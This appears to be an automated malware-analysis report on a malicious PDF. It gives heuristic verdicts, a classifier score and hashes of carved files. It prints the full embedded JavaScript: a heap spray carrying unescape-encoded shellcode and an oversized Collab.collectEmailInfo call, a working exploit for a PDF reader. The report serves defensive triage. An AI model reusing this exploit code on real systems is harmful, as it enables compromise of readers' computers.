Malware Insights
The PDF file contains embedded JavaScript, flagged by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0001_000.js', appears to be obfuscated, as suggested by the PDF_UNESCAPE heuristic firing and the 'Script obfuscation indicators' signal. The primary function of this script is likely to download and execute a secondary payload from a remote source, a common technique for initial access or later infection stages. Because of the obfuscation, the exact download URL or execution method could not be definitively determined.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9989
Heuristics (4)
- JavaScript action (severity: low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  /Type /Annot /Subtype /Screen /Border [0 0 0]/AA << /PV << /S /JavaScript /JS (var a=new Array(1073741823); var fil=unescape('\%u0d0d'); for(var i=1;i<0x10000;i=i+i)fil=fil+fil; fil=fil+unescape("\%uc933\%ue983\%ud9dd\%ud9ee\%u2474\%u5bf4\%u7381\%ue213\%ub844\%u83b1\%ufceb\%uf4e2\%uac1e\%ub1fc\%u44e2\%uf433\%ucfde\%ub4c4\%u459a\%u3a57\%u5cad\%uee33\%u45c2\%uf853\%u7069\%ub033\%u750c\%u2878\%uc04e\%uc578\%u85e5\%ubc72\%u86e3\%u4553\%u10d9\%ub59c\%ua197\%uee33\%u45c6\%ud753\%u4869\%u3af3\%u58bd\%u5ab9\%u5869\% … /Rect [91.8009 386.1246 440.4934 734.817]
- Embedded JS stream (severity: low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| javascript_obj0001_000.js | pdf-javascript-stream | PDF /JS object 1 at offset 0x106 | 816 bytes | c0b141fe0c7bfb7000d19cb612f9610b75cfecf5c45d2bbe856518d06d71bb4d | No threats found | likely (carved artifact contains 3 eval/decoder/string-building tokens) |
| javascript_obj0001_000_shellcode_00.bin | pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 1 at offset 0x106 | 164 bytes | 1213565db01d40a0784b9998a50ab439b1db0d7b23c5863e070a5def7501a462 | Win.Exploit.Fnstenv_mov-1 | unlikely |

Preview script (first 1,000 lines of javascript_obj0001_000.js):

```javascript
var a=new Array(1073741823);
var fil=unescape('%u0d0d');                    // filler pattern
for(var i=1;i<0x10000;i=i+i)fil=fil+fil;       // double the filler until it reaches 0x10000 characters
// append the unescape()-decoded shellcode (the 164-byte carved artifact ClamAV flags as Win.Exploit.Fnstenv_mov-1)
fil=fil+unescape("%uc933%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%ue213%ub844%u83b1%ufceb%uf4e2%uac1e%ub1fc%u44e2%uf433%ucfde%ub4c4%u459a%u3a57%u5cad%uee33%u45c2%uf853%u7069%ub033%u750c%u2878%uc04e%uc578%u85e5%ubc72%u86e3%u4553%u10d9%ub59c%ua197%uee33%u45c6%ud753%u4869%u3af3%u58bd%u5ab9%u5869%ub033%ucd09%u95e4%u87e6%u7189%ucf86%u81f8%u8467%ubdc0%u0469%u3ab4%u5892%u3a15%u4c8a%ub853%uc469%ub108%u44e2%ud933%u1bde%u4789%u1282%u4931%u8461%ue1c3%u3a8a%u5360%u2c91%u4f20%u4a68%u4eef%u2705%uddd9%u6a81%uc9dd%u4487%ub1b8");
for(var i=0;i<0xd00;i=i+1)a[i]=fil+i;          // heap spray: 0xd00 array slots each hold filler + shellcode
var s=unescape('%ubeef%u0ded');
for(var i=2;i<0x4000;i=i+i){s=s+s;a[i]=s;}     // second, growing pattern stored at power-of-two indices
Collab.collectEmailInfo(s,s,s,s,s,s,s,s,s,s);  // oversized arguments passed to the Collab.collectEmailInfo API
app.alert('done');
app.execMenuItem('Close');
```